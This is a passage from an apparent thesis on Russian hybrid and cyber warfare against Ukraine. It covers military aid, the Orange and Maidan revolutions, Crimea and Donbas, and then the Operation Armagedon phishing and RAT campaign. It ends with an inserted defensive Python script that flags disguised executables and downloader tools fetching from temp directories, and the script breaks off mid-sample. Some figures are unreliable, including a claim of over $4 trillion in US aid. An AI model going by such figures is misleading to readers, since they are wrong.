97 Ruslan Rudomsky, “Как изменились Вооруженные силы Украины за 25 лет?” Depo News, 6 June 2016. https://www.depo.ua/rus/war/yak-zminilis-zbroyni-sili-ukrayini-za-25-rokiv-06122016110000

The United States supports Ukraine financially to supplement the shortage of military training, equipment and expertise. Between 1946 and 2012 the total foreign assistance of the United States to Ukraine amounted to over $4 Trillion USD. The majority of the funding was for economic assistance, not military assistance, with only $910.9 Million USD over the 66 years, an average of $13.8 Million USD a year, going to total military assistance, which includes threat reduction, drug interdiction and counter-drug assistance, military financing, education and training, peacekeeping and other assistance.99 In 2013, at the start of the Maidan Revolution, military assistance for the year totaled $41.3M USD with a heavy focus, $32.8M USD or 79.4 percent of all spending, on Cooperative Threat Reduction.100 In 2014, the start of the War in Donbas, military funding to Ukraine again increased, with the United States spending $57.3M USD, the largest proportion of that being for Cooperative Threat Reduction, $49.2M USD, or 85.86 percent of all military spending.101 In 2015, the United States began to take a different approach by allocating Ukraine $76.8M USD in military funding with only $27.7M USD, 36 percent of the total military assistance, going towards Cooperative Threat Reduction. In 2015 there was a pivot to providing assistance in the category of Foreign Military Financing, often used for equipment and other military strengthening purchases, with $47.0M USD, or 61.2 percent of all military assistance to Ukraine, falling in that category.102 In FY2016 the DoD announced a new security assistance program, the Ukraine Security Assistance Initiative, which aimed to “provide defensive equipment and training” to the Ukrainian Military.103 In 2016, the military assistance provided to Ukraine from the United States jumped to $311.4M USD, with no money allocated to Cooperative Threat Reduction. Instead, FY2016 saw $80.3M USD allocated to Foreign Military Financing, a substantial increase from $6.6M and $6.1M USD in 2014 and 2015, respectively.104 The “other military assistance” category received the bulk of the funding, $228.2M USD, 73.28 percent of the FY2016 total, raised from zero in both 2014 and 2015.105

98 Rudomsky, “Как изменились Вооруженные силы Украины за 25 лет?” 2016.
99 USAID, U.S. Overseas Loans and Grants: Obligations and Loan Authorizations, July 1 1945 - September 30 2016. Washington DC: GPO, 2016. 178.
100 USAID, U.S. Overseas Loans and Grants, 178.
101 Ibid.

Military assistance to Ukraine is not only coming from the United States, as Ukraine receives funds from the majority of Western states, including Canada. Since 2014 Canada has provided assistance totaling over $700M CAD, over $525.3M USD, in “financial development, humanitarian and non-lethal military assistance, including military equipment.”106 Similar to the United States, Canada assists in training, especially police and civilian interaction training, and other programs aimed at strengthening civilian trust in the Ukrainian government and political system.107 The majority of Canadian assistance to Ukraine has been for International Security and Crisis Response and Country and Regional Programs, which totals $66.93M CAD, 85.7 percent of all assistance to Ukraine.108

102 USAID, U.S. Overseas Loans and Grants, 178.
103 Ibid., 1; and Ukraine Security Assistance Initiative, Security Assistance Monitor at the Center for International Policy, last modified April 29, 2019. securityassistance.org/content/Ukraine%20security%20assistance%20initiative
104 USAID, U.S. Overseas Loans and Grants, 178.
105 Ibid.
106 House of Commons, “Canada’s Support to Ukraine In Crisis and Armed Conflict: Report of the Standing Committee on National Defence,” Standing Committee on National Defence, 42nd Parliament, 1st Session. December 2017. 1-2.
107 Ibid.

While these assistance numbers may appear to be large amounts of money to aid Ukraine, military endeavors are expensive, and Ukraine is in a state of war on its own soil, which raises both cost and need. Since Ukraine lost the majority of its Air Force and military equipment when Russia annexed Crimea, there is a great need to restock and resupply the military. From 2014 to 2017 Ukrainian military assets have declined in all areas. The military has lost 488 battle tanks, 716+ armored vehicles, all submarines, 96 fixed wing combat aircraft and 170 helicopters.109 While these numbers may not seem drastic, the lost assets amount to nearly half of all equipment. Costs to replace equipment are high, and the Ukrainian military is working to phase out old Soviet equipment and replace it with Western-produced military equipment. Even so, a Soviet-made MiG-29, which is currently flown by the Ukrainian Air Force, costs $22M USD per unit. An hour of flight time is estimated to cost $24,000 USD. Newer planes and U.S.-manufactured military equipment are even more expensive to acquire, maintain and operate. An F-35A fighter jet costs $89.2M USD each, while a newer generation F-35B costs $115.5M USD.110 The funding Ukraine receives from the United States raises the total spending Ukraine has for advancing infrastructure, but it still does not place Ukraine on the same level as Russian military spending, especially when it comes to infrastructure for cyber capabilities, as the majority of government assistance focuses on weapons and social programs.

108 Statistical Report on International Assistance 2015-2016, Global Affairs Canada, last modified April 28, 2017. http://www.international.gc.ca/gac-amc/publications/odaaa-lrmado/sria-rsai-2015-16-d2.aspx?lang=eng
109 House of Commons, “Canada’s Support to Ukraine In Crisis and Armed Conflict,” 61.
110 Producing, Operating and Supporting a 5th Generation Fighter, Lockheed Martin, last modified 2019. https://www.f35.com/about/cost

108 Statistical Report on International Assistance 2015-2016, Global Affairs Canada, last modified April 28, 2017 http://www.international.gc.ca/gac-amc/publications/odaaa-lrmado/sria-rsai-2015-16-d2.aspx?lang=eng 109 House of Commons, “Canada’s Support to Ukraine In Crisis and Armed Conflict,” 61 110 Producing, Operating and supporting a 5th Generation Fighter, Lockheed Martin, last modified 2019. https://www.f35.com/about/cost 52

4 UKRAINIAN CRISIS

Chapter 3 clearly demonstrates that large states with ample funding and a large knowledge base have a substantial power imbalance with small states that lack funding for modern technologies as well as having a smaller population of skilled workers. As cyber is still a relatively new aspect of warfare, it has become a major focus of states across the globe that can fund new innovations in this sphere with the goal of outpacing opponents. However, the imbalance between states that have strong technological capabilities and the states that cannot afford to fund new cyber warfare technologies is vast. Disadvantaged states have few defensive structures, leave equipment in exposed areas where it is vulnerable to tampering, or have too much technology for each expert in the state to properly defend all systems. Conversely, large states can continue to fund innovation and defensive programs at a rate which ensures their technology will be superior to the rest of the world.

To some extent large powers such as the United States can control the public perception of the threat of cyberattacks by heavily investing in protection efforts and other public services aimed at combating cyberattacks or assisting their victims. Larger states’ economic ability to fund programs and technology protects them from receiving the most crippling cyberattacks or allows them to mitigate the effects more effectively. However, a smaller state embroiled in a geographical or political dispute with a larger state is more likely to be the victim of a detrimental cyberattack.111 Small states are unable to defend themselves to the same extent a large state would in a similar situation, making the most prevalent cyber defense system, active defense, an impossibility both technically and monetarily.

111 Valeriano and Maness, "The Dynamics of Cyber Conflict between Rival Antagonists."

Recall that the primary focus of this thesis is the interaction between cyber and conventional warfare in the Ukrainian Crisis, the first conflict of its kind and one whose long-term implications make it important to understand. Hybrid warfare in Ukraine has been ongoing, with the Russian government's goal being to harm Ukrainian society and to compromise the Ukrainian government's control. Through hybrid warfare the Kremlin is able to disrupt the flow of Ukrainian government operations and the day-to-day activities of citizens, and to sow frustration with the ineffectual response of the Ukrainian government. By exploiting pre-existing vulnerabilities in Ukrainian infrastructure and society, the Kremlin's hybrid war aims not only at loosening the government's hold but at unravelling the very fabric of Ukrainian society from inside its borders.

This chapter begins with a historical overview of Russian-Ukrainian relations since Ukrainian independence and then discusses the five cyberattacks used in this thesis. For each cyberattack, an in-depth look at the attack is given to better understand the threats Ukraine faces, and each attack is then categorized according to the definitions of cyberattacks provided in Chapter 2.

Employing hybrid warfare not only uses "critical vulnerabilities in hardware such as communications, infrastructure or transport" but also "takes advantage of social discontent or perceptions of corruption to level the playing field."112 Ukraine, with its history of corruption, Russian interference, public disapproval of state power, and a strained divide between the ethnic Russian and ethnic Ukrainian populations, presented easily exploitable social structures already marred by shortcomings. By exploiting this cultural instability, Russia has historically been able to exert a disproportionate amount of control over the Ukrainian population through targeted information warfare. However, as technology advances and the Ukrainian Crisis continues, the cyberattacks against Ukraine have turned from information dissemination to targeted attacks on critical infrastructure and other technologically reliant entities of the state, with immediate, long-lasting, real-world consequences.

112 Danyk, Maliarchuk and Briggs, "Hybrid War," 7.

From the start of Russia's involvement in Ukraine during the February 2014 annexation of Crimea, cyber has played a large role in Russia's movements. Cyberattacks took down communications between Crimea and mainland Ukraine before the "little green men" moved onto the peninsula, and a large number of information warfare tactics were used to alienate the people living on the peninsula from the rest of Ukraine.

The Ukrainian Crisis is the culmination of a multitude of deep-seated problems in Ukrainian society and of the former Soviet influence within the state. Since independence in 1991, Ukraine has struggled with government corruption, Russian influence in the state, and its bid to join the European Union. Beginning with the fall of the Soviet Union, corrupt politicians took positions in the Ukrainian government, a leftover structure from Soviet times strongly influenced by the corrupt nature of the Soviet system. In the 1990 Ukrainian Declaration of Sovereignty, Ukraine declared itself a neutral power, stating: "the Ukrainian SSR solemnly declares its intention of becoming a permanently neutral state that does not participate in military blocs and adheres to three nuclear free principles: to accept, to produce and to purchase no nuclear weapons".113 While remaining neutral, the independent Ukrainian government aimed to secure alliances with both the European Union and NATO, focusing on trade rather than military advancement.

113 Verkhovna Rada of the Ukrainian SSR, Declaration of State Sovereignty of Ukraine (Kyiv, Ukraine, 16 July 1990).

Ukrainian integration with the West began with a 1992 Ukrainian government trade agreement on steel products with the European Coal and Steel Community.114 Shortly after, in 1994, Ukraine signed a partnership with NATO, becoming a member of the Partnership for Peace (PfP). In 1998, Ukrainian officials first publicly declared the intention to become a member of the European Union.115 Since the early 2000s, Ukraine has been given an action plan by the EU to complete if it is to become a full member state. Communication between the two is open concerning the shortcomings of the government, its enforcement of anti-corruption policies, and the other political barriers to entry into the European Union.116 In 2004 the EU expanded and accepted the Baltic States, thereby successfully integrating former Soviet states. Following this, Ukraine again advocated for membership in the EU. Again, the European Union rebuffed the proposal, citing numerous violations of its core principles. Continued corruption, a Soviet by-product, hindered the country's advancement.

4.1 Historical Tensions

Historically, Russia and Ukraine have been similar culturally, socially and linguistically, leading the stronger state, Russia, to assume a continued partnership based on past alliances and interactions. Historic and linguistic ties have allowed Russia to view Ukraine as a beneficiary of Russian power, tying it closer to Russia than most of the other states once in the Russian sphere of influence. Approximately 17.3% of Ukrainian citizens are of Russian ethnicity and 77.8% are of Ukrainian ethnicity, although close to 50% of all citizens speak Russian as their first language and claim some Russian heritage, with a much denser Russian-speaking population in the regions of Crimea, Luhansk and Donetsk.117,118 Russian influence over the Russian-speaking minority in Ukraine stems from a long effort by Russia to exert its sphere of influence over its former territory. Russia officially ignored Kyiv's pro-Western foreign policy and used ties of language and culture to pressure certain ideological groups within Ukraine.119 This divide is embedded in the media, which shapes each ethnicity's view of the West and of Russia.

114 "EU-Ukraine Summits: 16 Years of Wheel-Spinning," The Ukrainian Week, March 15, 2018. http://ukrainianweek.com/Politics/73494.
115 Ibid.
116 Ibid.

Even during Ukraine's formative years, the state engaged in information warfare to protect citizens from the strengthening Russian hold over the ethnolinguistic Russian population in Ukraine.120 This has often led Russian-speaking Ukrainians to believe the opposite of what Ukrainian-speaking Ukrainians believe. Russian speakers tend to be exposed to Russian rhetoric and ideas, while the majority of Ukrainian speakers are exposed to Western ideas. This divided influence on the population leaves a deeper rift in Ukraine than a simple disagreement over language.

Orange Revolution

The continued push and pull of Western and Russian ideas and the divide between Russian and Ukrainian speakers bubbled to the surface before the Maidan Revolution. While the 2004 Orange Revolution was not as bloody or long-lasting, nor could it be considered hybrid warfare, it is important for understanding the historical significance of social unrest within Ukraine and how hybrid warfare can exploit vulnerabilities already present in a society. The Orange Revolution began as a protest against fraudulent voting in the 2004 Ukrainian presidential election.

117 State Statistics Service of Ukraine, Number and Composition of the Population of Ukraine by Data of the All-Ukrainian Census 2001 (Kyiv, Ukraine, 2001), http://2001.ukrcensus.gov.ua/eng/results/general/nationality/ (accessed Nov. 28, 2016).
118 Tor Bukkvoll, Ukraine and European Security (A&C Black, 1997), 38-39.
119 John Kriendler, "Ukrainian Membership in NATO: Benefits, Costs and Challenges," Defence Academy of the United Kingdom: European Center for Occasional Paper Series, no. 12 (July 2007): 11.
120 In accordance with the rules of non-engagement, yet in support of the Ukrainian government, the information war is waged by many different organizations and embassies to combat the false information presented by Russian media.

In the election the EU publicly supported Yushchenko for president.121 Russian media and Kremlin-backed directors helped Yanukovych's campaign by advising, directing and promoting it.122 The Ukrainian media was controlled by the corrupt Ukrainian government, which backed Yanukovych as the next president; it attacked Yushchenko for the length of the campaign and gave him no news airtime. Yushchenko was obstructed by air traffic controllers and road blocks, a truck tried to run his car off the road, and he was followed by state security operatives.123 In September 2004 Yushchenko was poisoned with dioxin. His supporters blamed Yanukovych and the corrupt government backing him, but the media listed "eating contaminated sushi, getting herpes, and undergoing Botox treatment to preserve his 50-year-old good looks" as the only plausible explanations for his condition.124

Following the announcement of a Yanukovych victory, protesters staged non-violent demonstrations against him because the exit polls and the official count differed by over four percent.125 Election monitors at multiple polling stations recounted how voters moved between polling stations with multiple absentee ballots, casting votes for Yanukovych.126 The fraudulent result was annulled and Yushchenko was declared the winner of the repeat vote. The Orange Revolution was a blow to Russia and to Putin, who had advocated for Yanukovych as the next president of Ukraine. However, Yushchenko was fearful after the violent campaign and the Orange Revolution; his health was weak, as was his will to be a powerful leader. As president he was not an effective politician and instead worked to consolidate his power, fearful of retribution.127

121 "EU-Ukraine Summits," The Ukrainian Week.
122 Adrian Karatnycky, "Ukraine's Orange Revolution," Foreign Affairs 84, no. 2 (2005): 49.
123 Ibid.
124 Ibid.
125 Ibid., 36.
126 Ibid.
127 Adrian Karatnycky and Alexander J. Motyl, "The Key to Kiev: Ukraine's Security Means Europe's Stability," Foreign Affairs 88, no. 3 (2009): 107-108.

Under Yushchenko the government was split, his former partners turned against his weak style of governance, and the economy took a downturn, further fracturing an already unstable political arena.128 The relationship with Russia remained a top priority during Yushchenko's presidency, and there was a desire to improve it, but the end goal remained the "consolidation of Ukraine's democracy and market economy through integration with the EU."129 Under Yushchenko, the Ministry of European Integration worked to accelerate Ukraine's partnership with the EU by raising standards and pursuing the other reforms needed to secure a membership invitation.130

Yushchenko did not succeed in his post, sowing anger among both those who had supported him and those who had supported Yanukovych. Each side had their own qualms with the Yushchenko presidency. Those who had supported his presidential bid were frustrated with his cordial treatment of Russia and his willingness to embrace the Russian involvement and influence in infrastructure, society and political dealings. Those who had supported Yanukovych for president were angry at the ineffectiveness of Yushchenko and saw his presidential term as an illegitimate power grab. Yushchenko, whose campaign platform had strongly advocated for integration into the EU as a means to a more stable and economically robust state, had failed to deliver on his promises. Yanukovych supporters blamed the strong Westward focus of the government for the ineffectual changes within the Ukrainian state and the hardships they continued to endure.

128 Karatnycky and Motyl, "The Key to Kiev," 108.
129 Ibid.
130 Adrian Karatnycky, "Ukraine's Orange Revolution," 50-51.

Yanukovych Wins

The following presidential election, held after a divisive end to, but full term of, Yushchenko's presidency, pitted Yanukovych against Yuliya Tymoshenko, a former ally of Yushchenko turned critic. In February 2010 Viktor Yanukovych beat Tymoshenko in a run-off with 48.95% of the vote, concentrated largely in the eastern regions of Luhansk and Donetsk and on the Crimean Peninsula. The ethnically Russian areas supported Yanukovych, much as they had in the 2004 election. Soon after he was elected president, Yanukovych signed Ukraine's non-bloc status into law, making Ukraine militarily neutral and halting any rumored NATO integration.131 While remnants of pro-EU deals were still in the works in the Ukrainian government, Yanukovych began to quietly dismantle the relationship with the West and build stronger ties with Russia.

4.2 Maidan Revolution

In 2013, Viktor Yanukovych rejected an EU deal that would have brought Ukraine closer to the EU in trade and finance. EU integration, long part of the state plans of previous governments, was brought to an abrupt halt. Since Ukraine had been in open agreement with the European Union about its intention to become a member state since the early 2000s and had agreed in 2008 to work collectively towards that goal, the pivot from EU integration towards a closer partnership with Russia was an unwelcome change for many.132 The Yevromaidan Revolution (eng: European Square Revolution, hereafter the Maidan Revolution, Revolution, or Maidan) began in response on 21 November 2013 on Maidan Nezalezhnosti (eng: Independence Square). The first rallies of the Maidan Revolution began in Kyiv, led by opposition leader Arseniy Yatsenyuk, who promoted peaceful protests through public Facebook events.133

131 Adrian Karatnycky, "Ukraine's Orange Revolution," 50-51.
132 "EU-Ukraine Summits: 16 Years of Wheel-Spinning," The Ukrainian Week.

Protests quickly spread to Lviv, Luhansk, Donetsk, Kharkiv and other large cities throughout Ukraine.134 After several months the street protests turned violent, leading to the deaths of over one hundred citizens. It was unclear which side had instigated the violence: protesters blamed the government for firing on unarmed, peaceful demonstrators, while the government released statements condemning the violent actions of organized street gangs as its start. In early 2014 the confrontation escalated from peaceful protest to open violence among factions of street gangs, organized paramilitaries, and government operatives. The most violent protests, on Hrushevskoho Street, had been ongoing for several days before the first three people were shot dead by snipers.135,136

On 22 January 2014 the first direct death on Independence Square was recorded as clashes on Hrushevskoho Street intensified between the Ukrainian special police force (Berkut) and protesters. The deadliest day was 20 February, when over 50 protesters, largely unarmed, were shot by snipers firing from atop the Hotel Ukraine.137 Both sides, those supporting the government and those opposing Yanukovych, took up arms and came into direct conflict; most of the time they did not know who was shooting, who had shot first, or from what position they were under fire.138 The leaders of the opposition political movement, who had begun the peaceful protests in 2013 against the pivot away from EU integration, strongly advocated against violence in any form, calling on the people to "conduct massive protest actions in all of Ukraine. They must witness our strength."139

133 "Народне віче за європейську Україну" [People's Assembly for a European Ukraine], Facebook, accessed March 20, 2017.
134 "EuroMaidan rallies in Ukraine - Nov. 21-23 coverage," KyivPost, November 25, 2013, accessed March 17, 2017.
135 "Автомайдан. Хто ми?" [Automaidan. Who are we?], Автомайдан (Automaidan), accessed March 24, 2017.
135 "Raw video footage of Ukraine EuroMaidan protesters gunned down in Kiev by snipers," YouTube, February 22, 2014, accessed March 19, 2017. https://www.youtube.com/watch?v=gsRPEXxI2dk.
136 "Ukraine Maidan deaths: Who fired shots?" BBC News, accessed March 20, 2017. http://www.bbc.com/news/world-europe-31435719.
137 "Ukraine Maidan deaths: Who fired shots?" BBC News.
138 "Що таке "Правий сектор"?" [What is "Right Sector"?], ПРАВИЙ СЕКТОР (Right Sector).

Kidnappings and beatings of prominent opposition leaders were a further concern of those protesting against Yanukovych's government. Dmytro Pylypets, an organizer of the protests in Kharkiv, was beaten, stabbed and left to die in the harsh Ukrainian winter.140 In late December Tetyana Chornovol, an activist and journalist turned protest leader who had documented Yanukovych's lavish lifestyle, was deliberately run off the road by a utility jeep and then beaten by an unknown number of men; when she ran, they forcibly detained her and beat her in the street.141 A picture of her bloodied and bruised face was used on anti-government materials distributed by the opposition. Dmytro Bulatov, the leader of a protest group, was kidnapped in late January and reappeared a week later, visibly tortured and beaten.142 He had part of his ear cut off, claimed to have been crucified, and had cuts all over his body, which he said were "done by men with Russian accents".143 His kidnapping came one day after the kidnapping of another prominent leader, Igor Lutsenko, and protester Yuri Verbitsky.144 Lutsenko gave accounts of similar beatings, and Verbitsky was found dead in the Boryspil region, the same region where Bulatov reappeared.145 These attacks spurred the idea that there were "death squads", deployed either by Russia or by Yanukovych's government, aimed at intimidating and killing the leaders of the opposition.146 This led to an escalation of violence from the initially peaceful protesters as well as a more forceful and outward approach from the Ukrainian government and pro-Russian supporters.

139 "Ukraine protests after Yanukovych EU deal rejection," BBC News, November 30, 2013, accessed March 17, 2017. http://www.bbc.com/news/world-europe-25162563.
140 "Ukraine activist Chornovol's beating causes outrage," BBC News, December 25, 2013, accessed March 22, 2017. http://www.bbc.com/news/world-europe-25515838.
141 David Herszenhorn, "Journalist Is Beaten in Latest Attack on Ukrainian Opposition," The New York Times, December 25, 2013, accessed March 20, 2017. http://www.nytimes.com/2013/12/26/world/europe/ukraine.html.
142 "Ukraine opposition activist Dmytro Bulatov says kidnappers "crucified" him, cut up ears and face," CBS News, January 31, 2014, accessed March 21, 2017. http://www.cbsnews.com/news/ukraine-opposition-activist-dmytro-bulatov-says-kidnappers-crucified-him/.
143 "Stand-off over 'tortured' Ukrainian activist Dmytro Bulatov," BBC News, January 31, 2014, accessed March 18, 2017. http://www.bbc.com/news/world-europe-25988661.
144 Ibid.
145 "Stand-off over 'tortured' Ukrainian activist Dmytro Bulatov," BBC News.

Under mounting pressure from the people and the international community, and faced with the success of the protesters, Yanukovych announced early presidential elections and extended a peace agreement to the opposition's main leadership on 21 February 2014.147 The deal Yanukovych offered was rejected by all the organizations that received it.148 With no options left except impeachment, Viktor Yanukovych fled Ukraine for Russia on 22 February 2014 with the help of Vladimir Putin.

4.3 Annexation of Crimea

On 23 February 2014, demonstrations supporting Russia sprang up in Sevastopol, Crimea, and by 27 February unmarked, masked troops had taken over the parliament of Crimea and initiated a referendum on Crimean independence.149 The largest party in the government of Crimea (80 of the 100 legislative seats) was "publicly committed to autonomy within Ukraine."150 A week after the Parliament building was adorned with a Russian flag, the local leader, Aksyonov, declared that Parliament was appealing to Putin for the annexation of Crimea.151 The annexation was seen throughout much of the Western world as an illegal push by Moscow to assert dominance over Crimea, which has a Russian-majority population. Moscow continuously denied any Russian involvement in the takeover of Parliament and maintained that the pro-Russian separatists were acting of their own accord, neither influenced nor funded by the Kremlin. The pro-Russian propaganda that sprang up quickly in Crimea left no doubt as to the funding and the power behind the quick, decisive and masterful takeover. On March 1, the Russian parliament approved Putin's request to use force in Ukraine to protect Russian interests. On March 18, Putin signed a bill to bring Crimea into the Russian Federation.152

146 See http://www.bbc.com/news/world-europe-25988661, http://www.nytimes.com/2013/12/26/world/europe/ukraine.html, https://www.kyivpost.com/article/content/ukraine-politics/journalist-and-protest-activist-chornovol-beaten-near-kyiv-334224.html, http://www.bbc.com/news/world-europe-25515838, https://www.youtube.com/watch?v=yOOXFpK-HG4 and the full press conference with Bulatov in Vilnius, Feb 5, 2014, https://www.youtube.com/watch?v=4_qjhi9qep0.
147 "EuroMaidan rallies in Ukraine (Feb. 19 live updates)," KyivPost, February 20, 2014, accessed March 26, 2017.
148 Ibid.
149 "How the separatists delivered Crimea to Moscow," Reuters.
150 Ibid.
151 Ibid.

4.4 War in Donbas

Shortly after this, Donbas, which comprises the regions of Luhansk and Donetsk in eastern Ukraine, was thrown into turmoil as demonstrations arose across the region in the aftermath of the annexation of Crimea and the end of the Maidan Revolution. Both Donetsk and Luhansk declared themselves separate "People's Republics" several months after the end of Maidan. These regions were claimed by armed pro-Russian separatists with the help of the Russian military, although the Kremlin denied all alleged involvement in Ukraine. The Donetsk and Luhansk People's Republics were declared by the new Ukrainian government to be "terrorist organizations with a rigid hierarchy, financing channels and supply of weapons."153 The fighting pits pro-Russian separatists (funded by the Kremlin) against the Ukrainian military and Ukrainian paramilitary groups, the latter of which disagree with the government's approach to fighting the invasion.

The Ukrainian Crisis has been fought under a guise of falsehood, with the Russian government categorically denying both physical and cyber involvement in Ukraine. The Kremlin has continuously denied involvement in eastern Ukraine and Crimea. Even after the internationally covered downing of commercial flight MH17 by a Russian Buk missile over the Donetsk region, Russia continued to deny involvement in the region. International pressure mounted, but the Kremlin kept denying involvement while showing public support for the pro-Russian separatists in eastern Ukraine. This denial of accountability has been a hallmark of the War in Donbas and of the Ukrainian Crisis as a whole. Coupled with the historically divided nature of Ukraine, the differences between ethnolinguistic groups, historical Russian involvement in the society and the remnants of the Soviet system, the atmosphere was perfect for exploiting physical and cyber vulnerabilities through modern hybrid warfare.

152 "Ukraine crisis: Timeline," BBC News, November 13, 2014.
153 InterFax Ukraine, "Ukraine's prosecutor general classifies self-declared Donetsk and Luhansk republics as terrorist organizations," KyivPost, May 16, 2014.

4.5 Cyberattacks against Ukraine

Since Ukrainian independence after the fall of the Soviet Union, Russia has exerted a strong influence over Ukrainian territory, citizens and cyber infrastructure, including ownership of the main telecommunications providers in Ukraine. Before the Maidan Revolution there was "a fairly typical array of [cyber] incidents" in Ukraine, most of them limited to Distributed Denial of Service (DDoS) attacks.154 Most attacks were information warfare attacks, such as the 2014 election hacking that displayed the winner of the presidential election as the ultra-nationalist, right-wing candidate of the militarized political party Right Sector. The initial attacks are thought to have been the work of amateur hacktivist groups not funded by the Russian government.155 While the election tampering caused panic and confusion in both Ukraine and Russia, as Russian state TV broadcast the incorrect results, it did little lasting harm to government infrastructure. However, as the Maidan Revolution and the War in Donbas unfolded, cyberattacks increased and transformed from hacktivism into serious malware campaigns such as Red October, MiniDuke and NetTraveler.156

154 Nikolay Koval, "Revolution Hacking," in Cyber War in Perspective: Russian Aggression against Ukraine, ed. Kenneth Geers, NATO CCDCOE Publications (Tallinn: 2015): 55.
155 Ibid. This is also corroborated by the attribution of the initial attacks, most of which were claimed by CyberBerkut, a pro-Russian group operating out of eastern Ukraine. This group has no known funding ties to the Russian government, despite its support for the Russian government's intentions in eastern Ukraine.

The first large-scale attack that caused significant damage to the Ukrainian state took place during the annexation of the Crimean Peninsula. During the annexation, cyber tactics were employed to disrupt the communications of Kyiv Rada members, cutting all communication between the Crimean Peninsula and mainland Ukraine and thereby forcing the Crimean people to rely on the unmarked soldiers for everything from emergency services to news.157 After Crimea was annexed, attacks continued, and the "relative sophistication of these attacks suggested that they were directed and controlled by a state or military entity, such as the GRU or FSB, rather than a co-opted hacker group."158 When the War in Donbas began after the LPR and DPR declared independence, cyberattacks again rose in prevalence and persistence.

Cyberattacks against Ukraine have largely been attacks on critical infrastructure, on institutions, or on both. Some have specifically targeted the military or the government, but as the Ukrainian Crisis continues the attacks keep growing in sophistication and in the damage they do to cyber networks. Spillover from government or military targets has occurred, with attacks devastating commercial entities and institutions outside Ukraine. The following five attacks were chosen because of their devastating nature and the prominent role each plays in gaining advantage over Ukraine militarily, socially and structurally. Each attack is analyzed by its functionality and its components to determine the cyberattack category, as defined in Chapter 2, in which it belongs. The attributes and definitions of an attack are important to understand when choosing which attacks to analyze with which tools.

156 Nikolay Koval, "Revolution Hacking," 55.
157 Marie Baezner and Patrice Robin, "Hotspot Analysis: Cyber and Information Warfare in the Ukrainian Conflict," Center for Security Studies (CSS) (Zurich, June 2017).
158 Connell and Vogler, "Russia's Approach to Cyber Warfare," 21.

Operation Armagedon.

Operation Armagedon159 was the name given to the Remote Access Tool (RAT) campaign that targeted Ukrainian government, law enforcement and military networks to gain "insight into near term Ukrainian intentions and plans" in the Ukrainian Crisis and subsequently the War in Donbas.160 The attack can be traced back to malicious code time-stamped, at the earliest, June 26, 2013.161 It was around this time that the Ukrainian government initially decided to accept the Ukraine-European Union Association Agreement, which would have brought Ukraine closer to member-state status in the European Union. The first known use of the malicious code was between August 12 and September 16, 2013, in the lead-up to the 10th Annual Yalta Meeting, "Changing Ukraine in a Changing World: Factors of Success."162 Although both the implementation of the malicious software and the initial use of Operation Armagedon predate the Maidan Revolution, the attack persisted until April 3, 2015, a total of 646 days from the earliest timestamp.163

The attack was launched through phishing: e-mails carrying malicious attachments were sent to Ukrainian targets. The malicious files were designed to look like documents pertinent to the ongoing crisis in Donbas, such as "Total List of People detained and held in днр [DPR] from July 2014.scr", and others were copies of stolen official files.164 Note that the .scr extension marks a Windows screensaver, which is an ordinary executable; the document-like name is the lure. These malicious files acted as droppers for Self-Extracting Archives (SFX), which in turn used the legitimate "wget.exe" to fetch payloads from a remote Command and Control (C&C) server.165 The remote C&C was then used to deliver the RAT, which sent information from the infected computer to the C&C and stole legitimate documents for use in later attacks.166

159 I use the title Operation Armagedon, rather than Operation Armageddon, because the misspelled version appears in the attack's metadata.
160 Lookingglass Cyber Threat Intelligence Group, "Operation Armageddon: Cyber Espionage as a Strategic Component of Russian Modern Warfare," April 28, 2015.
161 Ibid., 4.
162 Ibid.
163 Ibid.
164 Ibid.
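The infection chain just described (a document-looking executable attachment, an SFX archive, then the legitimate wget.exe fetching a payload from a remote server) leaves a recognizable trace in process-creation telemetry. The Python triage script below is an added example, not code from this thesis or from the Lookingglass report. It runs two heuristics over constructed process-creation log lines in a hypothetical ts|parent|image|cmdline format and flags (1) executables whose file names imitate documents and (2) a command-line downloader launched from, or by something in, a temporary directory with a remote URL. The file names, paths and the address 203.0.113.7 are all assumptions made for the example.

```python
"""Triage of process-creation events for an Operation Armagedon-style chain:
document-looking .scr/.exe lure -> SFX extraction -> wget.exe pulling a payload.
Added example; log format, paths and addresses are constructed assumptions."""
import re
from dataclasses import dataclass

# Extensions Windows executes on double-click (.scr is a screensaver, i.e. an EXE).
EXEC_EXT = (".scr", ".exe", ".pif", ".com", ".bat", ".cmd")
# "report.pdf.scr": a document extension immediately followed by an executable one.
DOUBLE_EXT = re.compile(r"\.(doc|docx|xls|xlsx|pdf|rtf|txt)\.(scr|exe|pif|com|bat|cmd)$", re.I)
# Lure vocabulary (English and Ukrainian); a heuristic, so expect some false positives.
DOC_WORDS = ("list", "detained", "report", "order", "список", "затриман", "наказ", "звіт")
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\tmp\\")
DOWNLOADERS = ("wget.exe", "curl.exe", "bitsadmin.exe", "certutil.exe")


@dataclass
class Event:
    ts: str
    parent: str   # image path of the parent process
    image: str    # image path of the created process
    cmdline: str  # full command line of the created process


def parse_line(line: str) -> Event:
    """Constructed format: ts|parent|image|cmdline (cmdline may itself contain '|')."""
    ts, parent, image, cmdline = line.rstrip("\n").split("|", 3)
    return Event(ts, parent, image, cmdline)


def looks_like_disguised_document(image: str) -> bool:
    """True for an executable whose file name is built to read as a document."""
    name = image.rsplit("\\", 1)[-1].lower()
    if not name.endswith(EXEC_EXT):
        return False
    if DOUBLE_EXT.search(name):
        return True
    stem = name.rsplit(".", 1)[0]
    return any(word in stem for word in DOC_WORDS)


def is_downloader_from_temp(ev: Event) -> bool:
    """True for a downloader binary staged in (or spawned from) a temp directory with a URL."""
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if not image.endswith(DOWNLOADERS):
        return False
    staged = any(d in image or d in parent for d in TEMP_DIRS)
    remote = "http://" in cmd or "https://" in cmd
    return staged and remote


def triage(lines):
    """Return (timestamp, rule, evidence) for every event that trips a heuristic."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if looks_like_disguised_document(ev.image):
            findings.append((ev.ts, "disguised-document-executable", ev.image))
        if is_downloader_from_temp(ev):
            findings.append((ev.ts, "downloader-from-temp", ev.cmdline))
    return findings


# Constructed sample telemetry (not real log data): lure opened from Outlook,
# SFX extraction directory spawning wget.exe, then two benign events.
SAMPLE_LOG = [
    r"2014-08-04T09:12:01|C:\Program Files\Microsoft Office\OUTLOOK.EXE|"
    r"C:\Users\op\AppData\Local\Temp\Total List of People detained in DPR from July 2014.scr|"
    r"C:\Users\op\AppData\Local\Temp\Total List of People detained in DPR from July 2014.scr /S",
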